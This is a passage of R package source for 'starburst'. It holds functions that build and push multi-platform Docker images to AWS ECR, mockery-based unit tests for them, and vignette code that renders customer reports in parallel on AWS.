    lock_file <- renv::paths$lockfile()
  }

  # Calculate hash using shared helper
  env_hash <- compute_env_hash(lock_file)

  # Get configuration for ECR URI
  config <- get_starburst_config()
  account_id <- config$aws_account_id
  ecr_uri <- sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker", account_id, region)
  image_uri <- sprintf("%s:%s", ecr_uri, env_hash)

  # Check if image exists in ECR
  image_exists <- check_ecr_image_exists(env_hash, region)

  if (!image_exists) {
    cat_info("[Setup] Building Docker image for R environment (this may take 5-10 minutes)...\n")
    build_environment_image(env_hash, region)
  }

  # Get cluster name from config
  cluster <- config$cluster %||% "starburst-cluster"

  # Return environment info
  list(
    hash = env_hash,
    image_uri = image_uri,
    cluster = cluster
  )
}

#' Check if ECR image exists
#'
#' @keywords internal
check_ecr_image_exists <- function(tag, region) {
  config <- get_starburst_config()
  ecr <- get_ecr_client(region)

  tryCatch({
    images <- ecr$describe_images(
      repositoryName = "starburst-worker",
      imageIds = list(list(imageTag = tag))
    )

    length(images$imageDetails) > 0
  }, error = function(e) {
    return(FALSE)
  })
}

#' Check if a public base image exists (anonymously)
#'
#' Public ECR images are world-readable, so we can probe the manifest without
#' credentials via `docker manifest inspect`. Returns FALSE on any error (Docker
#' missing, network issue, tag absent) so callers fall back to a private build.
#'
#' @param image_uri Full public image reference, e.g.
#'   \code{public.ecr.aws/f8g1e7l5/base:r4.6.1}.
#' @return TRUE if the manifest is retrievable, FALSE otherwise.
#' @keywords internal
public_base_image_exists <- function(image_uri) {
  tryCatch({
    safe_system("docker", c("manifest", "inspect", image_uri),
                stdout = TRUE, stderr = TRUE)
    TRUE
  }, error = function(e) {
    FALSE
  })
}

#' Get base image URI
#'
#' @keywords internal
get_base_image_uri <- function(region) {
  config <- get_starburst_config()
  account_id <- config$aws_account_id
  r_version <- paste0(R.version$major, ".", R.version$minor)

  # Use base image tag based on R version
  base_tag <- sprintf("base-%s", r_version)

  sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker:%s",
          account_id, region, base_tag)
}

#' Ensure a buildx builder with the docker-container driver exists and is usable
#'
#' Idempotent across repeated runs and cross-platform (Windows/macOS/Linux).
#' Probes for an existing builder via \code{docker buildx inspect}; creates it
#' only when missing; bootstraps it so it is ready to build. A docker-container
#' driver is required for multi-platform (\code{linux/amd64,linux/arm64})
#' builds. Does not mutate the user's default buildx context (no \code{--use});
#' the build pins the builder explicitly via \code{--builder}.
#'
#' Returns TRUE if the named builder is usable, FALSE otherwise, and never
#' throws -- callers decide policy. This fixes the failure mode where
#' \code{buildx create} errored on an already-existing builder, the error was
#' swallowed, and the subsequent \code{buildx build} failed with "existing
#' instance for <name> but no append mode" (GitHub #24).
#'
#' @param builder_name Name of the buildx builder (default "starburst-builder")
#' @return TRUE if the named builder is usable, FALSE otherwise
#' @keywords internal
ensure_buildx_builder <- function(builder_name = "starburst-builder") {
  # stdout/stderr are captured (not discarded) so that when a buildx call fails
  # safe_system()'s stop() carries the real stderr, instead of the failure being
  # swallowed here and surfacing later as an opaque "no builder found" at the
  # buildx build step (GitHub #24/#30).

  # 1. Does it already exist? inspect returns non-zero (-> error) if not;
  #    --bootstrap also boots an existing-but-stopped builder.
  exists <- tryCatch({
    safe_system("docker", c("buildx", "inspect", "--bootstrap", builder_name),
                stdout = TRUE, stderr = TRUE)
    TRUE
  }, error = function(e) FALSE)

  if (exists) {
    return(TRUE)
  }

  # 2. Missing: create it with the docker-container driver and bootstrap it.
  created <- tryCatch({
    safe_system(
      "docker",
      c("buildx", "create", "--name", builder_name,
        "--driver", "docker-container", "--bootstrap"),
      stdout = TRUE, stderr = TRUE
    )
    TRUE
  }, error = function(e) {
    cat_warn(sprintf("Warning: failed to create buildx builder '%s': %s\n",
                     builder_name, conditionMessage(e)))
    FALSE
  })

  if (!created) {
    return(FALSE)
  }

  # 3. Confirm it booted and is selectable. 'inspect' verifies it is usable;
  #    'use' registers it as current so the explicit --builder reference in
  #    buildx build resolves (guards against the create not persisting).
  tryCatch({
    safe_system("docker", c("buildx", "inspect", "--bootstrap", builder_name),
                stdout = TRUE, stderr = TRUE)
    safe_system("docker", c("buildx", "use", builder_name),
                stdout = TRUE, stderr = TRUE)
    TRUE
  }, error = function(e) {
    cat_warn(sprintf("Warning: buildx builder '%s' created but not usable: %s\n",
                     builder_name, conditionMessage(e)))
    FALSE
  })
}

#' Build base Docker image with common dependencies
#'
#' @keywords internal
build_base_image <- function(region) {
  cat_info("[Docker] Building staRburst base image...\n")

  # Validate Docker is installed
  tryCatch({
    safe_system("docker", c("--version"), stdout = TRUE, stderr = TRUE)
  }, error = function(e) {
    stop("Docker is not installed or not accessible. Please install Docker: https://docs.docker.com/get-docker/")
  })

  # Get configuration
  config <- get_starburst_config()
  account_id <- config$aws_account_id
  r_version <- paste0(R.version$major, ".", R.version$minor)
  base_tag <- sprintf("base-%s", r_version)

  # Check if base image already exists
  if (check_ecr_image_exists(base_tag, region)) {
    base_uri <- get_base_image_uri(region)

    # Check image age if TTL is configured
    ttl_days <- config$ecr_image_ttl_days
    if (!is.null(ttl_days)) {
      image_fresh <- check_ecr_image_age(region, base_tag, ttl_days, force_rebuild = FALSE)
      if (!image_fresh) {
        cat_info("   * Image expired, rebuilding...\n")
        # Continue to rebuild below
      } else {
        cat_success(sprintf("[OK] Base image already exists: %s\n", base_uri))
        return(base_uri)
      }
    } else {
      cat_success(sprintf("[OK] Base image already exists: %s\n", base_uri))
      return(base_uri)
    }
  }

  # Create temporary build directory
  build_dir <- tempfile(pattern = "starburst_base_build_")
  dir.create(build_dir, recursive = TRUE)
  on.exit(unlink(build_dir, recursive = TRUE), add = TRUE)

  tryCatch({
    # Process Dockerfile.base template
    dockerfile_template <- system.file("templates", "Dockerfile.base", package = "starburst")
    if (!file.exists(dockerfile_template)) {
      stop("Dockerfile.base template not found")
    }

    # Dockerfile.base takes R_VERSION as a real Docker build arg (passed below).
    # The legacy {{R_VERSION}} gsub is kept for backward compatibility with any
    # older template copy; on the current template it is a harmless no-op.
    template_content <- readLines(dockerfile_template)
    dockerfile_content <- gsub("\\{\\{R_VERSION\\}\\}", r_version, template_content)
    writeLines(dockerfile_content, file.path(build_dir, "Dockerfile"))

    cat_info(sprintf("   * Build directory: %s\n", build_dir))
    cat_info(sprintf("   * R version: %s\n", r_version))
    cat_info("   * This includes system deps + renv + future/globals/qs/paws\n")
    cat_info("   * This is a one-time build (3-5 min), reused by all projects\n")

    # Authenticate with ECR
    cat_info("   * Authenticating with ECR...\n")
    ecr <- get_ecr_client(region)
    auth_token <- ecr$get_authorization_token()

    if (length(auth_token$authorizationData) == 0) {
      stop("Failed to get ECR authorization token")
    }

    token_data <- auth_token$authorizationData[[1]]
    decoded_token <- rawToChar(base64enc::base64decode(token_data$authorizationToken))
    token_parts <- strsplit(decoded_token, ":")[[1]]
    password <- token_parts[2]

    # Docker login - pass password via stdin (secure, no shell exposure)
    login_result <- tryCatch({
      safe_system(
        "docker",
        c("login", "--username", "AWS", "--password-stdin", token_data$proxyEndpoint),
        stdin = password
      )
      TRUE
    }, error = function(e) {
      stop(sprintf("Failed to authenticate with ECR for account %s in region %s: %s",
                  account_id, region, e$message))
    })

    # Build multi-platform base image
    ecr_uri <- sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker", account_id, region)
    image_tag <- sprintf("%s:%s", ecr_uri, base_tag)
    cat_info(sprintf("   * Building multi-platform base image: %s\n", image_tag))
    cat_info("   * Platforms: linux/amd64, linux/arm64\n")

    # Ensure a docker-container buildx builder exists (required for multi-platform).
    if (!ensure_buildx_builder("starburst-builder")) {
      stop(paste0(
        "Could not create or access the 'starburst-builder' buildx builder, ",
        "which is required for multi-platform (linux/amd64, linux/arm64) builds. ",
        "Ensure Docker is running and that 'docker buildx' is available, then retry. ",
        "Inspect builders with: docker buildx ls"
      ))
    }

    # Build and push multi-platform image (no cache for clean multi-platform build)
    safe_system(
      "docker",
      c("buildx", "build",
        "--builder", "starburst-builder",
        "--platform", "linux/amd64,linux/arm64",
        "--build-arg", sprintf("R_VERSION=%s", r_version),
        "--no-cache",
        "-t", image_tag,
        "--push",
        build_dir)
    )

    cat_success(sprintf("[OK] Base image built and pushed: %s\n", image_tag))
    cat_success("[OK] This base image will be reused by all future projects\n")

    return(image_tag)

  }, error = function(e) {
    cat_error(sprintf("[ERROR] Base image build failed: %s\n", e$message))
    stop(e)
  })
}

#' Get base image source URI
#'
#' @param use_public Logical, use public ECR base image (default TRUE)
#' @keywords internal
get_base_image_source <- function(use_public = TRUE) {
  r_version <- paste0(R.version$major, ".", R.version$minor)

  if (use_public) {
    # Public ECR (no auth needed, instant pull). Published by the
    # build-base-images.yml workflow under this account's public ECR alias.
    # (The friendly 'starburst' alias needs an AWS Support request; until then
    # images live under the default alias 'f8g1e7l5'.)
    return(sprintf("public.ecr.aws/f8g1e7l5/base:r%s", r_version))
  } else {
    # Private ECR (build if missing)
    config <- get_starburst_config()
    account_id <- config$aws_account_id
    region <- config$region
    return(sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker:base-%s",
                   account_id, region, r_version))
  }
}

#' Ensure base image exists
#'
#' @param region AWS region
#' @param use_public Logical, use public ECR base image (default TRUE)
#' @keywords internal
ensure_base_image <- function(region, use_public = NULL) {
  # Get preference from config or default to FALSE (safer default)
  if (is.null(use_public)) {
    config <- get_starburst_config()
    use_public <- config$use_public_base %||% FALSE
  }

  r_version <- paste0(R.version$major, ".", R.version$minor)
  base_tag <- sprintf("base-%s", r_version)

  if (use_public) {
    # Try the published public base image first; fall back to a private build
    # if it isn't available for this R version (or can't be reached).
    base_uri <- get_base_image_source(use_public = TRUE)
    cat_info(sprintf("Trying public base image: %s\n", base_uri))

    if (public_base_image_exists(base_uri)) {
      cat_success(sprintf("[OK] Using public base image: %s\n", base_uri))
      return(base_uri)
    }

    cat_warn(sprintf("   Public base image not available for R %s\n", r_version))
    cat_info("   Falling back to private base image build...\n")
    use_public <- FALSE
  }

  if (!use_public) {
    # Use private base image (build if needed)
    if (!check_ecr_image_exists(base_tag, region)) {
      cat_info("[Package] Base image not found in private ECR, building it now...\n")
      cat_info("   (This will take 3-5 minutes, but only needed once per R version)\n")
      build_base_image(region)
    } else {
      base_uri <- get_base_image_uri(region)
      cat_info(sprintf("[OK] Using existing private base image: %s\n", base_uri))
    }

    return(get_base_image_uri(region))
  }
}

#' Build environment image
#'
#' @param tag Image tag
#' @param region AWS region
#' @param use_public Logical, use public ECR base image (default NULL = from config)
#' @keywords internal
build_environment_image <- function(tag, region, use_public = NULL) {
  cat_info("[Docker] Building project Docker image...\n")

  # Validate Docker is installed
  tryCatch({
    safe_system("docker", c("--version"), stdout = TRUE, stderr = TRUE)
  }, error = function(e) {
    stop("Docker is not installed or not accessible. Please install Docker: https://docs.docker.com/get-docker/")
  })

  # Ensure base image exists (will build if needed, or use public)
  base_image_uri <- ensure_base_image(region, use_public = use_public)

  # Get configuration
  config <- get_starburst_config()
  account_id <- config$aws_account_id

  # Get ECR repository URI
  ecr_uri <- sprintf("%s.dkr.ecr.%s.amazonaws.com/starburst-worker", account_id, region)

  # Create temporary build directory
  build_dir <- tempfile(pattern = "starburst_build_")
  dir.create(build_dir, recursive = TRUE)
  on.exit(unlink(build_dir, recursive = TRUE), add = TRUE)

  tryCatch({
    # Copy renv.lock from project, excluding staRburst itself
    if (!file.exists("renv.lock")) {
      stop("renv.lock not found in current directory. Initialize renv first with: renv::init()")
    }

    # Read and filter lock file to exclude starburst package
    lock_data <- jsonlite::fromJSON("renv.lock", simplifyVector = FALSE)
    if (!is.null(lock_data$Packages$starburst)) {
      lock_data$Packages$starburst <- NULL
    }
    jsonlite::write_json(lock_data, file.path(build_dir, "renv.lock"),
                        pretty = TRUE, auto_unbox = TRUE)

    # Copy worker script
    worker_script <- system.file("templates", "worker.R", package = "starburst")
    if (!file.exists(worker_script)) {
      stop("Worker script template not found")
    }
    file.copy(worker_script, file.path(build_dir, "worker.R"))

    # Process Dockerfile template
    dockerfile_template <- system.file("templates", "Dockerfile.template", package = "starburst")
    if (!file.exists(dockerfile_template)) {
      stop("Dockerfile template not found")
    }

    template_content <- readLines(dockerfile_template)
    dockerfile_content <- gsub("\\{\\{BASE_IMAGE\\}\\}", base_image_uri, template_content)
    writeLines(dockerfile_content, file.path(build_dir, "Dockerfile"))

    cat_info(sprintf("   * Build directory: %s\n", build_dir))
    cat_info(sprintf("   * Base image: %s\n", base_image_uri))
    cat_info("   * Building only project-specific packages...\n")

    # Authenticate with ECR
    cat_info("   * Authenticating with ECR...\n")
    ecr <- get_ecr_client(region)
    auth_token <- ecr$get_authorization_token()

    if (length(auth_token$authorizationData) == 0) {
      stop("Failed to get ECR authorization token")
    }

    token_data <- auth_token$authorizationData[[1]]
    decoded_token <- rawToChar(base64enc::base64decode(token_data$authorizationToken))
    token_parts <- strsplit(decoded_token, ":")[[1]]
    password <- token_parts[2]

    # Docker login - pass password via stdin (secure, no shell exposure)
    login_result <- tryCatch({
      safe_system(
        "docker",
        c("login", "--username", "AWS", "--password-stdin", token_data$proxyEndpoint),
        stdin = password
      )
      TRUE
    }, error = function(e) {
      stop(sprintf("Failed to authenticate with ECR for account %s in region %s: %s",
                  account_id, region, e$message))
    })

    # Build multi-platform image
    image_tag <- sprintf("%s:%s", ecr_uri, tag)
    cat_info(sprintf("   * Building multi-platform image: %s\n", image_tag))
    cat_info("   * Platforms: linux/amd64, linux/arm64\n")

    # Ensure a docker-container buildx builder exists (required for multi-platform).
    if (!ensure_buildx_builder("starburst-builder")) {
      stop(paste0(
        "Could not create or access the 'starburst-builder' buildx builder, ",
        "which is required for multi-platform (linux/amd64, linux/arm64) builds. ",
        "Ensure Docker is running and that 'docker buildx' is available, then retry. ",
        "Inspect builders with: docker buildx ls"
      ))
    }

    # Build and push multi-platform image (no cache for clean multi-platform build)
    safe_system(
      "docker",
      c("buildx", "build",
        "--builder", "starburst-builder",
        "--platform", "linux/amd64,linux/arm64",
        "--no-cache",
        "-t", image_tag,
        "--push",
        build_dir)
    )

    cat_success(sprintf("[OK] Image built and pushed: %s\n", image_tag))

    return(image_tag)

  }, error = function(e) {
    cat_error(sprintf("[ERROR] Image build failed: %s\n", e$message))
    stop(e)
  })
}

#' Build initial environment
#'
#' @keywords internal
build_initial_environment <- function(region) {
  ensure_environment(region)
}

test_that("build_environment_image validates Docker installation", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock safe_system to simulate Docker not installed
  mockery::stub(
    build_environment_image,
    "safe_system",
    function(command, args, ...) {
      stop("docker: command not found")
    }
  )

  expect_error(
    build_environment_image("test-tag", "us-east-1"),
    "Docker is not installed"
  )
})

test_that("build_environment_image checks for renv.lock", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock Docker check to succeed
  mockery::stub(build_environment_image, "system2", function(...) {
    list()  # status = 0
  })

  # Mock Docker check to pass
  mockery::stub(build_environment_image, "safe_system", function(command, args, ...) {
    if (command == "docker" && any(grepl("--version", args))) {
      return(list(status = 0, stdout = "Docker version 20.10.0"))
    }
    stop("Unexpected command")
  })

  # Mock get_starburst_config (called first before checking renv.lock)
  mockery::stub(build_environment_image, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })

  # Mock ensure_base_image to avoid building base image
  mockery::stub(build_environment_image, "ensure_base_image", function(...) {
    "mock-base-image:latest"
  })

  # Mock file.exists to return FALSE for renv.lock
  mockery::stub(build_environment_image, "file.exists", function(path) {
    if (grepl("renv.lock", path)) return(FALSE)
    return(TRUE)
  })

  expect_error(
    build_environment_image("test-tag", "us-east-1"),
    "renv.lock not found"
  )
})

test_that("build_environment_image creates proper image tag", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # This is an integration-level test that would need full mocking
  # Skip for now - needs AWS credentials
  skip("Requires full AWS setup")
})

test_that("ensure_environment returns hash and image URI", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock renv::paths$lockfile
  mockery::stub(ensure_environment, "renv::paths$lockfile", function() {
    "test-lock.file"
  })

  # Mock file.exists and dir.exists so walk-up logic terminates quickly
  mockery::stub(ensure_environment, "file.exists", function(...) TRUE)
  mockery::stub(ensure_environment, "dir.exists", function(...) FALSE)

  # Mock compute_env_hash (replaces readLines + digest mocking since those
  # are now in a separate function that mockery stubs don't reach)
  mockery::stub(ensure_environment, "compute_env_hash", function(...) {
    "abc123hash"
  })

  # Mock get_starburst_config
  mockery::stub(ensure_environment, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })

  # Mock check_ecr_image_exists
  mockery::stub(ensure_environment, "check_ecr_image_exists", function(...) TRUE)

  result <- ensure_environment("us-east-1")

  expect_type(result, "list")
  expect_named(result, c("hash", "image_uri", "cluster"))
  expect_equal(result$hash, "abc123hash")
  expect_match(result$image_uri, "^123456789012\\.dkr\\.ecr\\.us-east-1")
  expect_match(result$image_uri, "abc123hash$")
})

test_that("ensure_environment builds image if not exists", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock renv::paths$lockfile
  mockery::stub(ensure_environment, "renv::paths$lockfile", function() {
    "test-lock.file"
  })

  # Mock file.exists and dir.exists so walk-up logic terminates quickly
  mockery::stub(ensure_environment, "file.exists", function(...) TRUE)
  mockery::stub(ensure_environment, "dir.exists", function(...) FALSE)

  # Mock compute_env_hash (replaces readLines + digest mocking since those
  # are now in a separate function that mockery stubs don't reach)
  mockery::stub(ensure_environment, "compute_env_hash", function(...) {
    "abc123hash"
  })

  # Mock get_starburst_config
  mockery::stub(ensure_environment, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })

  # Mock check_ecr_image_exists to return FALSE
  mockery::stub(ensure_environment, "check_ecr_image_exists", function(...) FALSE)

  # Mock build_environment_image
  build_called <- FALSE
  mockery::stub(ensure_environment, "build_environment_image", function(...) {
    build_called <<- TRUE
  })

  result <- ensure_environment("us-east-1")

  expect_true(build_called)
})

test_that("ensure_buildx_builder uses existing builder without creating", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  calls <- list()
  mockery::stub(ensure_buildx_builder, "safe_system",
    function(command, args, ...) {
      calls[[length(calls) + 1]] <<- args
      # inspect succeeds -> builder already exists
      invisible(list(status = 0))
    })

  result <- ensure_buildx_builder("starburst-builder")

  expect_true(result)
  # Exactly one call, and it is an inspect (no create)
  expect_length(calls, 1)
  expect_true(all(c("buildx", "inspect") %in% calls[[1]]))
  expect_false(any(vapply(calls, function(a) "create" %in% a, logical(1))))
})

test_that("ensure_buildx_builder creates builder when missing", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  calls <- list()
  mockery::stub(ensure_buildx_builder, "safe_system",
    function(command, args, ...) {
      calls[[length(calls) + 1]] <<- args
      # The first call is the existence probe (inspect) -> fail = missing.
      # Subsequent calls (create, confirming inspect) succeed.
      is_first <- length(calls) == 1
      if (is_first && "inspect" %in% args) {
        stop("no builder named starburst-builder")
      }
      invisible(list(status = 0))
    })

  result <- ensure_buildx_builder("starburst-builder")

  expect_true(result)
  # Must have attempted a create with the docker-container driver
  create_call <- Filter(function(a) "create" %in% a, calls)
  expect_length(create_call, 1)
  expect_true(all(c("--driver", "docker-container", "--bootstrap")
                  %in% create_call[[1]]))
  expect_true(all(c("--name", "starburst-builder") %in% create_call[[1]]))

  # After create, the builder must be explicitly selected so a later
  # `buildx build --builder starburst-builder` resolves (GitHub #30).
  use_call <- Filter(function(a) "use" %in% a, calls)
  expect_length(use_call, 1)
  expect_true("starburst-builder" %in% use_call[[1]])
})

test_that("ensure_buildx_builder returns FALSE when create fails", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  mockery::stub(ensure_buildx_builder, "safe_system",
    function(command, args, ...) {
      # Both the existence probe and the create attempt fail
      stop("buildx error")
    })

  expect_false(ensure_buildx_builder("starburst-builder"))
})

test_that("build_environment_image aborts when builder is unusable", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Docker --version check passes; buildx build must never be reached.
  mockery::stub(build_environment_image, "safe_system",
    function(command, args, ...) {
      if (any(grepl("--version", args))) {
        return(list(status = 0, stdout = "Docker version 20.10.0"))
      }
      if (any(args == "build")) stop("buildx build must not be called")
      list(status = 0)
    })
  mockery::stub(build_environment_image, "get_starburst_config",
                function() list(aws_account_id = "123456789012"))
  mockery::stub(build_environment_image, "ensure_base_image",
                function(...) "mock-base-image:latest")
  mockery::stub(build_environment_image, "file.exists", function(path) TRUE)
  mockery::stub(build_environment_image, "jsonlite::fromJSON",
                function(...) list(Packages = list()))
  mockery::stub(build_environment_image, "jsonlite::write_json", function(...) invisible())
  mockery::stub(build_environment_image, "file.copy", function(...) TRUE)
  mockery::stub(build_environment_image, "readLines", function(...) "FROM {{BASE_IMAGE}}")
  mockery::stub(build_environment_image, "writeLines", function(...) invisible())
  mockery::stub(build_environment_image, "get_ecr_client",
                function(...) list(get_authorization_token = function()
                  list(authorizationData = list(list(
                    authorizationToken = base64enc::base64encode(charToRaw("AWS:pw")),
                    proxyEndpoint = "https://example")))))
  # Builder cannot be made usable
  mockery::stub(build_environment_image, "ensure_buildx_builder", function(...) FALSE)

  expect_error(
    build_environment_image("test-tag", "us-east-1"),
    "starburst-builder"
  )
})

# Helper: stub starburst_setup's collaborators so it runs offline, returning
# whether build_initial_environment was invoked.
run_setup_capturing_build <- function(build_image) {
  built <- FALSE
  mockery::stub(starburst_setup, "is_setup_complete", function() FALSE)
  mockery::stub(starburst_setup, "check_aws_credentials", function() TRUE)
  mockery::stub(starburst_setup, "get_aws_account_id", function() "123456789012")
  mockery::stub(starburst_setup, "create_starburst_bucket", function(...) "starburst-test")
  mockery::stub(starburst_setup, "create_ecr_repository", function(...) list(repositoryUri = "uri"))
  mockery::stub(starburst_setup, "create_ecs_cluster", function(...) list(clusterName = "starburst-cluster"))
  mockery::stub(starburst_setup, "setup_vpc_resources",
    function(...) list(vpc_id = "vpc-1", subnets = list(), security_groups = list()))
  mockery::stub(starburst_setup, "save_config", function(...) invisible())
  mockery::stub(starburst_setup, "check_fargate_quota",
    function(...) list(limit = 1000, used = 0, available = 1000, increase_pending = FALSE))
  mockery::stub(starburst_setup, "build_initial_environment", function(...) built <<- TRUE)
  starburst_setup(force = TRUE, build_image = build_image)
  built
}

test_that("starburst_setup skips image build when build_image = FALSE", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  expect_false(run_setup_capturing_build(build_image = FALSE))
})

test_that("starburst_setup builds image when build_image = TRUE (default)", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  expect_true(run_setup_capturing_build(build_image = TRUE))
})

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(rmarkdown)

## ----template, eval=FALSE-----------------------------------------------------
# # Create report template
# report_template <- '
# ---
# title: "Monthly Analytics Report"
# output: html_document
# params:
#   customer_id: ""
#   customer_name: ""
#   month: ""
#   data: NULL
# ---
# 
# `​``{r template-setup, include=FALSE}
# knitr::opts_chunk$set(echo = FALSE, warning = FALSE, message = FALSE)
# `​``
# 
# # Monthly Report for `r params$customer_name`
# 
# **Customer ID:** `r params$customer_id`
# **Period:** `r params$month`
# **Report Generated:** `r format(Sys.time(), "%Y-%m-%d %H:%M")`
# 
# ---
# 
# ## Executive Summary
# 
# This report summarizes activity for `r params$customer_name` during `r params$month`.
# 
# \`\`\`{r summary}
# data <- params$data
# cat(sprintf("Total transactions: %d\\n", nrow(data)))
# cat(sprintf("Total revenue: $%.2f\\n", sum(data$revenue)))
# cat(sprintf("Average order value: $%.2f\\n", mean(data$revenue)))
# cat(sprintf("Active days: %d\\n", length(unique(data$date))))
# \`\`\`
# 
# ## Revenue Trend
# 
# \`\`\`{r revenue-plot, fig.width=8, fig.height=4}
# daily_revenue <- aggregate(revenue ~ date, data, sum)
# plot(daily_revenue$date, daily_revenue$revenue,
#      type = "l", lwd = 2, col = "steelblue",
#      main = "Daily Revenue Trend",
#      xlab = "Date", ylab = "Revenue ($)")
# grid()
# \`\`\`
# 
# ## Top Products
# 
# \`\`\`{r top-products}
# top_products <- head(
#   aggregate(revenue ~ product, data, sum),
#   10
# )
# top_products <- top_products[order(-top_products$revenue), ]
# knitr::kable(top_products, format.args = list(big.mark = ","))
# \`\`\`
# 
# ## Summary Statistics
# 
# \`\`\`{r stats}
# stats <- data.frame(
#   Metric = c("Total Orders", "Avg Order Value", "Max Order",
#              "Min Order", "Std Dev"),
#   Value = c(
#     nrow(data),
#     round(mean(data$revenue), 2),
#     round(max(data$revenue), 2),
#     round(min(data$revenue), 2),
#     round(sd(data$revenue), 2)
#   )
# )
# knitr::kable(stats, format.args = list(big.mark = ","))
# \`\`\`
# 
# ---
# 
# *This report was automatically generated using staRburst parallel processing.*
# '
# 
# # Save template to file
# writeLines(report_template, "report_template.Rmd")

## ----data, eval=FALSE---------------------------------------------------------
# # Function to generate data for one customer
# generate_customer_data <- function(customer_id) {
#   set.seed(customer_id)
# 
#   n_transactions <- sample(100:500, 1)
#   dates <- sort(sample(seq.Date(
#     from = as.Date("2026-01-01"),
#     to = as.Date("2026-01-31"),
#     by = "day"
#   ), n_transactions, replace = TRUE))
# 
#   products <- c("Product A", "Product B", "Product C",
#                 "Product D", "Product E")
# 
#   data.frame(
#     customer_id = customer_id,
#     date = dates,
#     product = sample(products, n_transactions, replace = TRUE),
#     revenue = round(rnorm(n_transactions, mean = 150, sd = 50), 2),
#     stringsAsFactors = FALSE
#   )
# }
# 
# # Generate customer list
# n_customers <- 50
# customers <- data.frame(
#   customer_id = sprintf("CUST%03d", 1:n_customers),
#   customer_name = paste("Company", LETTERS[1:n_customers %% 26 + 1],
#                        (1:n_customers %/% 26) + 1),
#   stringsAsFactors = FALSE
# )
# 
# head(customers)

## ----render-fn, eval=FALSE----------------------------------------------------
# generate_report <- function(customer_info) {
#   customer_id <- customer_info$customer_id
#   customer_name <- customer_info$customer_name
# 
#   # Generate data for this customer
#   data <- generate_customer_data(as.numeric(gsub("CUST", "", customer_id)))
# 
#   # Output file path
#   output_file <- sprintf("report_%s.html", customer_id)
# 
#   tryCatch({
#     # Render report
#     rmarkdown::render(
#       input = "report_template.Rmd",
#       output_file = output_file,
#       params = list(
#         customer_id = customer_id,
#         customer_name = customer_name,
#         month = "January 2026",
#         data = data
#       ),
#       quiet = TRUE
#     )
# 
#     list(
#       customer_id = customer_id,
#       success = TRUE,
#       output_file = output_file,
#       file_size = file.size(output_file),
#       render_time = Sys.time()
#     )
#   }, error = function(e) {
#     list(
#       customer_id = customer_id,
#       success = FALSE,
#       error = as.character(e),
#       render_time = Sys.time()
#     )
#   })
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 5 reports
# test_customers <- head(customers, 5)
# 
# cat(sprintf("Rendering %d reports locally...\n", nrow(test_customers)))
# local_start <- Sys.time()
# 
# local_results <- lapply(
#   split(test_customers, 1:nrow(test_customers)),
#   generate_report
# )
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("[OK] Completed in %.1f seconds\n", local_time))
# cat(sprintf("  Average: %.1f seconds per report\n", local_time / 5))
# cat(sprintf("  Estimated time for %d reports: %.1f minutes\n\n",
#             n_customers, (local_time / 5 * n_customers) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# cat(sprintf("Rendering %d reports on AWS...\n", n_customers))
# 
# # Convert data frame rows to list for starburst_map
# customer_list <- split(customers, 1:nrow(customers))
# 
# results <- starburst_map(
#   customer_list,
#   generate_report,
#   workers = 25,
#   cpu = 2,
#   memory = "4GB"
# )

## ----results, eval=FALSE------------------------------------------------------
# # Check success rate
# success_count <- sum(sapply(results, function(x) x$success))
# failure_count <- sum(!sapply(results, function(x) x$success))
# 
# cat("\n=== Report Generation Summary ===\n\n")
# cat(sprintf("Total reports: %d\n", length(results)))
# cat(sprintf("Successfully generated: %d (%.1f%%)\n",
#             success_count, (success_count / length(results)) * 100))
# cat(sprintf("Failed: %d\n\n", failure_count))
# 
# # File size summary
# successful_results <- results[sapply(results, function(x) x$success)]
# file_sizes <- sapply(successful_results, function(x) x$file_size)
# 
# cat("File size statistics:\n")
# cat(sprintf("  Total size: %.2f MB\n", sum(file_sizes) / 1024^2))
# cat(sprintf("  Average size: %.1f KB\n", mean(file_sizes) / 1024))
# cat(sprintf("  Range: %.1f - %.1f KB\n\n",
#             min(file_sizes) / 1024, max(file_sizes) / 1024))
# 
# # Show sample of generated reports
# cat("Generated reports:\n")
# report_files <- sapply(successful_results[1:10], function(x) x$output_file)
# print(report_files)

## ----distribution, eval=FALSE-------------------------------------------------
# generate_and_distribute <- function(customer_info) {
#   # Generate report
#   result <- generate_report(customer_info)
# 
#   if (result$success) {
#     # Upload to S3 (example)
#     tryCatch({
#       # paws::s3()$put_object(
#       #   Bucket = "my-reports-bucket",
#       #   Key = sprintf("reports/2026-01/%s", result$output_file),
#       #   Body = readBin(result$output_file, "raw",
#       #                  file.size(result$output_file))
#       # )
# 
#       result$uploaded <- TRUE
#       result$s3_url <- sprintf("s3://my-reports-bucket/reports/2026-01/%s",
#                               result$output_file)
#     }, error = function(e) {
#       result$uploaded <- FALSE
#       result$upload_error <- as.character(e)
#     })
#   }
# 
#   result
# }

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/reports.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/reports.R", package = "starburst"))

## ----setup, include=FALSE-----------------------------------------------------
knitr::opts_chunk$set(eval = FALSE)

## ----batching-bad-------------------------------------------------------------
# # Bad: 10,000 tasks of 0.1s each — overhead dominates
# starburst_map(1:10000, quick_fn, workers = 100)

## ----batching-good------------------------------------------------------------
